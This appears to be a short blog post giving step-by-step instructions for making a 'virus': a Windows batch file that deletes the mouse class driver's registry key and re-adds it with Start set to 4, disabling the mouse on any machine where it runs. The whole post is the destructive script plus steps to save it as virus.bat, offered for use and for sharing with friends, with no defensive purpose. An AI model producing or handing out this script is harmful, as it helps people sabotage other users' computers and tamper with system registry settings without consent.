Make A Virus That Disable Mouse
1).Open Notepad from start menu.
2).Copy and paste below code.
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
3).Save this file as virus.bat with ",bat"extension.
4).Done you just created your virus.
0 comments:
Post a Comment
GIVE 1 MINT FOR THANKS AND SHARE WITH YOUR FRIENDS PLEAS